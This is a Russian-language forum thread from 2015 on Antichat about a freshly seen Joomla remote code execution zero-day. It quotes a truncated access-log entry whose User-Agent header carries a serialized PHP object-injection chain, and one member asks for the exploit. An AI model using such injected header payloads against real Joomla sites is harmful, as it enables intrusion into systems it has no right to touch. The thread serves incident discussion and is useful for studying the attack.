Просто Joomla просто 0day

Discussion in 'Мировые новости. Обсуждения.' started by psihoz26, 15 Dec 2015.

  1. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    #1 psihoz26, 15 Dec 2015
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,066
    Likes Received:
    1,565
    Reputations:
    40
    И что он делает, нихуя не понял если честно

    PHP:
     2015 Dec 12 16:49:07 clienyhidden.access.log
    Src IP    74.3.170.33 CAN Alberta
    74.3.170.33 – –     [12/Dec/2015:16:49:40 -0500“GET /contactHTTP/1.1″ 403 5322 “http://google.com/” “}__test|O:21:\x22JDatabaseDriverMysqli\x22:3: ..
    {s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0: .. {}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:..
    {    s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:..
    это что
     
    #2 BabaDook, 15 Dec 2015
  3. ZodiaX

    ZodiaX Reservists Of Antichat

    Joined:
    7 May 2009
    Messages:
    533
    Likes Received:
    308
    Reputations:
    51
    Кто нибудь ловил уже в логах?
     
    #3 ZodiaX, 15 Dec 2015
  4. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,055
    Likes Received:
    1,532
    Reputations:
    1,128
    по-моему, проще посмотреть что фиксили разработчики джумлы, чтобы понять откуда ноги растут)
     
    _________________________
    #4 Rebz, 15 Dec 2015
    Yokohama-man likes this.
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,066
    Likes Received:
    1,565
    Reputations:
    40
    дай пожалуйста эксплоит
     
    #5 BabaDook, 15 Dec 2015
  6. ZodiaX

    ZodiaX Reservists Of Antichat

    Joined:
    7 May 2009
    Messages:
    533
    Likes Received:
    308
    Reputations:
    51
    Я так понял не фильтруются значения user agent'a при записи сессии в базу... хотя могу ошибаться.
     
    #6 ZodiaX, 15 Dec 2015
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,066
    Likes Received:
    1,565
    Reputations:
    40
    ну а что там, sql или rce или ещё что-то, в каком виде менять значение итд . ничего конкректного нету
     
    #7 BabaDook, 15 Dec 2015
  8. ZodiaX

    ZodiaX Reservists Of Antichat

    Joined:
    7 May 2009
    Messages:
    533
    Likes Received:
    308
    Reputations:
    51
    rce, а вот самого эксплойта нету.

    ps: https://github.com/rapid7/metasploit-framework/issues/6347
     
    #8 ZodiaX, 15 Dec 2015
    Last edited: 15 Dec 2015
  9. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    913
    Likes Received:
    480
    Reputations:
    724
    _________________________
    #9 VY_CMa, 15 Dec 2015
    ZodiaX likes this.
(You must log in or sign up to post here.)